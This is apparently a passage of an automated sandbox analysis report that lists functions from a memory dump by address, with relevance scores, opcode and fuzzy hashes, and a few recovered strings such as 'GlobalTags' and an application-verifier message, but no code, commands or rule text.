                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 1488083a0d42bf71021eaed8f5020838e65bc90fd59c5fecba3dd2c05c30b289
                                                                            • Instruction ID: 360fa6add51a45c8eca8f530dd63c9c3a1e3f24f8a77f04346d323c4410c792d
                                                                            • Opcode Fuzzy Hash: 1488083a0d42bf71021eaed8f5020838e65bc90fd59c5fecba3dd2c05c30b289
                                                                            • Instruction Fuzzy Hash: 39A10531604369AADF358A28CC41BFE2FADEF96714F084498EE459B381DF78DD44CA60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01636420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 12da2f8515f72ce54dfb73e0ef59727bbfda68526a5286b992a46e67aac2c9f9
                                                                            • Instruction ID: 836f8d45af19fe814070217369564c581f24821263da08bff5daf4d2e39e8586
                                                                            • Opcode Fuzzy Hash: 12da2f8515f72ce54dfb73e0ef59727bbfda68526a5286b992a46e67aac2c9f9
                                                                            • Instruction Fuzzy Hash: EF9163B190021ABFDB21DF99CC85FAE7BB8FF95B50F154065F600AB291D774AA00CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0165E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 2036f890c59ef6a33c88494a2bf2d4a76f5a675b5739e0f06de84aa6cda69760
                                                                            • Instruction ID: 46d4d741b1275a3f2b79161596139e2398316023940bb13c6c38ebfef9d63c34
                                                                            • Opcode Fuzzy Hash: 2036f890c59ef6a33c88494a2bf2d4a76f5a675b5739e0f06de84aa6cda69760
                                                                            • Instruction Fuzzy Hash: 8B91913290060AAFDF66AFA5DC44FAFBB79FF85780F104019F905AB251D7769A01CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015EA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: GlobalTags
                                                                            • API String ID: 0-1106856819
                                                                            • Opcode ID: 1c54ee62350524f6c5f8f778708127e5fff462589b8a444705e49ebb8f403944
                                                                            • Instruction ID: eb562bcb8d5ce633ad3c7d951cea8ece39ce6fba3be8e1b03d4395f55c5c7c85
                                                                            • Opcode Fuzzy Hash: 1c54ee62350524f6c5f8f778708127e5fff462589b8a444705e49ebb8f403944
                                                                            • Instruction Fuzzy Hash: 41715DB5E0162A8FDF28DF9CD9906ADBBB1BF48700F14812AE905AB341E7759941CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0167132D Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: xTy
                                                                            • API String ID: 0-476160978
                                                                            • Opcode ID: a3b8c642c2a76a1d52c10c60ba500713a339c066729acc344c42c96a91757f4b
                                                                            • Instruction ID: c31096800eaf348d4b4d6f3986a59ea1153bc742bc8788346f238b983a75c974
                                                                            • Opcode Fuzzy Hash: a3b8c642c2a76a1d52c10c60ba500713a339c066729acc344c42c96a91757f4b
                                                                            • Instruction Fuzzy Hash: E1818F71A00205DFDB09CFA8C890AAEBBF1FF49310F1581AAD859EB355D734EA51CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01654978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .mui
                                                                            • API String ID: 0-1199573805
                                                                            • Opcode ID: 789277f6e716186297971f86f969ef11e5c799de3d540fe639ce91ba0400db92
                                                                            • Instruction ID: 13c3b8086bb0e0710130db5ff36ff36db04561f2d2c06c982429e4aa13c25cad
                                                                            • Opcode Fuzzy Hash: 789277f6e716186297971f86f969ef11e5c799de3d540fe639ce91ba0400db92
                                                                            • Instruction Fuzzy Hash: F2519672D0022A9BDB94DFA9DC40AEEBBB4BF44614F0541A9ED11BB344EB349D41CBE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015CE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: EXT-
                                                                            • API String ID: 0-1948896318
                                                                            • Opcode ID: 4db590b959332971eab73ecff6c59bbe235f708da448435c6933e2ddafc88d14
                                                                            • Instruction ID: 5ce4ab0b15c7c1a5b3c094f430bb3c446fb3c27eae569fb294e126c043f987b6
                                                                            • Opcode Fuzzy Hash: 4db590b959332971eab73ecff6c59bbe235f708da448435c6933e2ddafc88d14
                                                                            • Instruction Fuzzy Hash: 91416F725083429FD721DEA9C981B6FBBE8FF88A14F44092DBA84EF140E674D904C796
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0162C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryHash
                                                                            • API String ID: 0-2202222882
                                                                            • Opcode ID: 186b6e9a16f36537d1b1bcee6c0bee3d85a5c0a96d5d73af6c6affe461296f58
                                                                            • Instruction ID: 3dada0907f80a9ccb55f41cf6740d41015e21e651badbd3313c37e7cb16a99f7
                                                                            • Opcode Fuzzy Hash: 186b6e9a16f36537d1b1bcee6c0bee3d85a5c0a96d5d73af6c6affe461296f58
                                                                            • Instruction Fuzzy Hash: 054135F1D0052DAADB21DA50CC84FDEB77DAB44714F0185E9EB08AB140DB749E898FA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01646B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            • Opcode ID: 2ba1c09bc32c1c08183dd11c368d53f705dbc4a206b24bc533c57c83c34044a4
                                                                            • Instruction ID: 5714209eae1aa47b2cdfc030735f7645a73ae44a7e85632ac3c5cb1eeeb00abb
                                                                            • Opcode Fuzzy Hash: 2ba1c09bc32c1c08183dd11c368d53f705dbc4a206b24bc533c57c83c34044a4
                                                                            • Instruction Fuzzy Hash: 3831F431A007199BEB22DF69CC50BEE7BA8EF46704F544068E941AF282D775EC45CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0162CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryName
                                                                            • API String ID: 0-215506332
                                                                            • Opcode ID: a43dd485acb5376edd62fe571dd4ec6ff35d03bd02b7e603a28fd8880d2ae62a
                                                                            • Instruction ID: 5d831812523f8c65f41709d16ac7b8b785ab0a4b70635c083ea3ee702af8c727
                                                                            • Opcode Fuzzy Hash: a43dd485acb5376edd62fe571dd4ec6ff35d03bd02b7e603a28fd8880d2ae62a
                                                                            • Instruction Fuzzy Hash: F531E37690092AAFEB15DA59CC55E6FBB74FF80760F014169E905AB250D7309E04DFE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0163892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0163895E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                            • API String ID: 0-702105204
                                                                            • Opcode ID: ba557ce8871b04f64dfb4b7d9d98e5733ce76fed6bc2c0e44768c044881fd4a5
                                                                            • Instruction ID: 6bea787475ebb6a47a4649f9862e585ce1e2a2c104a768cb2e10c4332a4cb7c3
                                                                            • Opcode Fuzzy Hash: ba557ce8871b04f64dfb4b7d9d98e5733ce76fed6bc2c0e44768c044881fd4a5
                                                                            • Instruction Fuzzy Hash: 4301F7312102029FE724AE5D9CC4ADA7B69FFC1354B44122CF64217691CB206C41CB96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015EE8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1623dfaf6231e53916e9f78300cdd4f89da0d35ea77a4a6d8839e75c2a8b885f
                                                                            • Instruction ID: 55c3532daaf82414655e42a01222fa3c96158856d5d32dba5d5b4507f9fa0331
                                                                            • Opcode Fuzzy Hash: 1623dfaf6231e53916e9f78300cdd4f89da0d35ea77a4a6d8839e75c2a8b885f
                                                                            • Instruction Fuzzy Hash: A9821472F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F516C Relevance: .8, Instructions: 785COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 106764da12cedd8239e62e93ef37095fb2c5e37c18ff4b3b85dd2507426dfb1f
                                                                            • Instruction ID: c2334d031177ece4a93d6bcd646abf75355b20c27102fdd25a6a77610a755991
                                                                            • Opcode Fuzzy Hash: 106764da12cedd8239e62e93ef37095fb2c5e37c18ff4b3b85dd2507426dfb1f
                                                                            • Instruction Fuzzy Hash: 7B62B33691464AAFCF25CF08D4904AEFB62FE51314B49C65CCEAB6B605E370B958CBD0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01652000 Relevance: .8, Instructions: 757COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bb954b65145d065c39f66f54d33b85ee913a60e97a69b78a75816141f56b0ac5
                                                                            • Instruction ID: dca3fa6d61d31dbd483626bf64429674865a152a8df32ec4d4f59f991a635c44
                                                                            • Opcode Fuzzy Hash: bb954b65145d065c39f66f54d33b85ee913a60e97a69b78a75816141f56b0ac5
                                                                            • Instruction Fuzzy Hash: 4142AE36608342DBD765CFA8CCA0A6BBBE5BB88740F09492DFE8297350D770D845CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0160739A Relevance: .7, Instructions: 705COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b531b291a9e21f176d07f1b856f0588bf4be2951abebf8769ec65081baf0c3d4
                                                                            • Instruction ID: 06f24fee6436918722631fdccf102b1f7603da8f1a68f129a32de17a869cdc20
                                                                            • Opcode Fuzzy Hash: b531b291a9e21f176d07f1b856f0588bf4be2951abebf8769ec65081baf0c3d4
                                                                            • Instruction Fuzzy Hash: DE429171A006169FDB1ACF59C8906BEB7B2FF88314B14856DD596AB380DB34FD42CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01605AA0 Relevance: .7, Instructions: 652COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                            • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                            • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                            • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015DB2C0 Relevance: .6, Instructions: 629COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 488665f74faf411d6bd6cbeff63b5453887b8803b1d7dd991a910e1bd6e9cb29
                                                                            • Instruction ID: 12520709bd6ead4599f224d84c76af8ca76b4254d7ad87fbc790da05141554a8
                                                                            • Opcode Fuzzy Hash: 488665f74faf411d6bd6cbeff63b5453887b8803b1d7dd991a910e1bd6e9cb29
                                                                            • Instruction Fuzzy Hash: 2C329F71E0021ADBDF24CF9CC890BAEBBB2FF95714F190129E905AB391E7359911CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01648158 Relevance: .6, Instructions: 617COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6fda69b1e51e8f6e38d1e998135ff081d28783b944046181ac71cd5d0a730b48
                                                                            • Instruction ID: cbf7c1fbf473750be9c974792c50f9bd85c8c4dc9258c8d33b282fa53b25c593
                                                                            • Opcode Fuzzy Hash: 6fda69b1e51e8f6e38d1e998135ff081d28783b944046181ac71cd5d0a730b48
                                                                            • Instruction Fuzzy Hash: C0424D75A102198FEB25CFA9CC41BADBBF9BF88300F158199E949EB342D7349985CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C2840 Relevance: .6, Instructions: 605COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aff261a8ac98386bd65e64529c645858eae272523fa77a96a5c098b34d919007
                                                                            • Instruction ID: b3798a40461b07ad2da3110ce44d4541579be8aae9be7afd5a7f6ee6f842e023
                                                                            • Opcode Fuzzy Hash: aff261a8ac98386bd65e64529c645858eae272523fa77a96a5c098b34d919007
                                                                            • Instruction Fuzzy Hash: 4E329C78A006568FDB25CF69CC447BEBBF2BF84704F18851DD8469B389D7B5A842CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0165A118 Relevance: .6, Instructions: 591COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5fd2abd83f0386f34bc07c06a64bbd7af045e35f3f026b901c871c92873fec72
                                                                            • Instruction ID: 4b76ddd8dc46d342b01b122f4e34dbca870d42a79dbfc601b3befad01cf62cf2
                                                                            • Opcode Fuzzy Hash: 5fd2abd83f0386f34bc07c06a64bbd7af045e35f3f026b901c871c92873fec72
                                                                            • Instruction Fuzzy Hash: 4C22C1742046618FEBA5CFADC894772BBF1AF44344F08865ADD868F386E735E452CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 016716CC Relevance: .6, Instructions: 571COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b6070bdfb76ff2314482f7473c7c875ce59506d9a253041883ba8c77270c3e6
                                                                            • Instruction ID: afad8b7cc72137fe52b32f86c8d710759aa07bb3aafe8cec45e62e7aa6a5c8bd
                                                                            • Opcode Fuzzy Hash: 2b6070bdfb76ff2314482f7473c7c875ce59506d9a253041883ba8c77270c3e6
                                                                            • Instruction Fuzzy Hash: F322B435A002168FDB19CF58C8906BAB7F2FF8A314F28456ED955DB345DB30E942CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015DFB80 Relevance: .6, Instructions: 559COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e8a2d149735e85eb1197798f250c9991dd1f9dd3101702dc2c345a3677c9c619
                                                                            • Instruction ID: c580e2e9f40da874de527816f182b1163a4f6e9ff9a513489182e4bf4f7706c4
                                                                            • Opcode Fuzzy Hash: e8a2d149735e85eb1197798f250c9991dd1f9dd3101702dc2c345a3677c9c619
                                                                            • Instruction Fuzzy Hash: 4622B37190061AAFDB15DFA8CC80BAEB7B5FF84300F148569E915AB345EB74E941CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015D8DBF Relevance: .6, Instructions: 554COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cb47c586ca7260882c0629f8dae78267a1712e632363a29b72d82b94c9944a18
                                                                            • Instruction ID: fc9e32ca8539355be350660768fb1270c7a61de012de7cec6769cba9627c9b5f
                                                                            • Opcode Fuzzy Hash: cb47c586ca7260882c0629f8dae78267a1712e632363a29b72d82b94c9944a18
                                                                            • Instruction Fuzzy Hash: 32224E70E0021ADBCB25CF99C8809BEFBF6FF84714B58809AE9559B245E734ED41CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015B6A50 Relevance: .5, Instructions: 548COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 651bc588455896b14d4f5a7d93ce75253d6ebd1de54fbe6cdaad600349b33baf
                                                                            • Instruction ID: a1ee95dad0d5fb7c81343d851f7863aa260a9d437529ac6c7c3a4152f7f93d80
                                                                            • Opcode Fuzzy Hash: 651bc588455896b14d4f5a7d93ce75253d6ebd1de54fbe6cdaad600349b33baf
                                                                            • Instruction Fuzzy Hash: 8C327B71A05215CFDB25CF68C880BAEBBF1FF48310F188569EA56AB395DB74E841CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01672446 Relevance: .5, Instructions: 485COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 94b93c5b78c27de316cecb239067a1008229316c76f7dd9dabadaa5a65dad075
                                                                            • Instruction ID: 9fdf3f7d2df893b3e4bfc26a777a06c127916aa58d7de3e3e45257da804f8380
                                                                            • Opcode Fuzzy Hash: 94b93c5b78c27de316cecb239067a1008229316c76f7dd9dabadaa5a65dad075
                                                                            • Instruction Fuzzy Hash: 4702E2746046518BEB24CF2ECD60275FBF1AF85300B19819EE9D6CB382D335E996DB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01605630 Relevance: .5, Instructions: 458COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                            • Instruction ID: ffb0d5ffaedd461392ff03f0fc5286a20521a18151f0aafea998c91714caa2ef
                                                                            • Opcode Fuzzy Hash: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                            • Instruction Fuzzy Hash: FDD14573B6471C4FC384DE6EDC82381B2D2ABD4528B5D843C9D18CB303F669E91E6688
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 016741A2 Relevance: .5, Instructions: 452COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1c14b8abc3d4eebda49585d820254bfb8b7067349329efb62a173f11e824965
                                                                            • Instruction ID: b933521dae19261a82cfef667b52bad72a9f45a581e7edc78fb9c9c69dfad72b
                                                                            • Opcode Fuzzy Hash: d1c14b8abc3d4eebda49585d820254bfb8b7067349329efb62a173f11e824965
                                                                            • Instruction Fuzzy Hash: A502A071E01219CFDF05CF98C8846ADBBB2FF98314F298169D556AB355EB30AA42CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0168B16B Relevance: .4, Instructions: 450COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8840ea980dd901a7d983832785dc5030be42dc51f05c89ce6e801cfa0a5f7c2a
                                                                            • Instruction ID: 51db0797cf657947e2dea2ee5238bb48ba69bce43858af58b39bd77d7fcd0079
                                                                            • Opcode Fuzzy Hash: 8840ea980dd901a7d983832785dc5030be42dc51f05c89ce6e801cfa0a5f7c2a
                                                                            • Instruction Fuzzy Hash: 47F10672E006158BCB18DF6CCDA167EFBF6AF98210719826DD856DB381E734EA01CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0168A9A6 Relevance: .4, Instructions: 425COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84e8b1bbe514ab280c80fd4934279282ecfabd7d4488fd6308e29b9ee49b934e
                                                                            • Instruction ID: 70b6f7fc984c41d61196f1dfe98977f29f111c373965a0f783efa3e805c1ef54
                                                                            • Opcode Fuzzy Hash: 84e8b1bbe514ab280c80fd4934279282ecfabd7d4488fd6308e29b9ee49b934e
